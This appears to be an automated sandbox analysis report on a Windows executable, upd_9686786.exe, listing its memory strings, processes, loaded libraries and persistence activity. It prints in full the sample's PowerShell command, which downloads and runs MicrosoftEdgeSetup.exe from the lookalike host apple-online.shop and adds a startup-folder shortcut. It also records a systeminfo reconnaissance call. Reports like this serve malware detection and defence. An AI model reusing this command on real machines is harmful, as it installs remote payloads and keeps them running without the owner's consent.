Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F02B3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apple-online.shop
Source: powershell.exe, 00000009.00000002.30156809218.0000020D82CC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.
Source: powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.exe
Source: powershell.exe, 00000009.00000002.30278139073.0000020DF3640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF09D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apple-online.shop/microsoftedgesetup.exe
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02153000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
Source: upd_9686786.exe | String found in binary or memory: https://www.certum.pl/CPS0
Source: upd_9686786.exe | String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\upd_9686786.exe | Code function: 0_2_00007FF76E653B6A 0_2_00007FF76E653B6A
Source: upd_9686786.exe, 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: reinstated6 vs upd_9686786.exe
Source: upd_9686786.exe, 00000008.00000000.29967145448.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename: reinstated6 vs upd_9686786.exe
Source: upd_9686786.exe | Binary or memory string: OriginalFilename: reinstated6 vs upd_9686786.exe
Source: classification engine | Classification label: mal60.evad.winEXE@18/6@0/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpsfeg15.nww.ps1
Source: upd_9686786.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\upd_9686786.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\upd_9686786.exe "C:\Users\user\Desktop\upd_9686786.exe"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: C:\Users\user\Desktop\upd_9686786.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c systeminfo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\Desktop\upd_9686786.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\systeminfo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: tuygh.lnk.2.dr LNK file: ..\..\..\..\..\..\..\Desktop\upd_9686786.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: upd_9686786.exe Static PE information: certificate valid
Source: upd_9686786.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: upd_9686786.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\upd_9686786.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()"
Source: upd_9686786.exe Static PE information: real checksum: 0x209e2 should be: 0x1d80b
Source: C:\Users\user\Desktop\upd_9686786.exe Code function: 0_2_00007FF76E651000 push rdx; ret 0_2_00007FF76E65101F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BCADA2 pushad ; retf 2_2_00007FFC94BCADB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BCD6FD push ebx; retn 0009h 2_2_00007FFC94BCD79A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC7C1E push eax; retf 2_2_00007FFC94BC7C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC841E push eax; ret 2_2_00007FFC94BC842D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC7BEE pushad ; retf 2_2_00007FFC94BC7C1D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFC94BC83EE pushad ; ret 2_2_00007FFC94BC841D

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree).
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
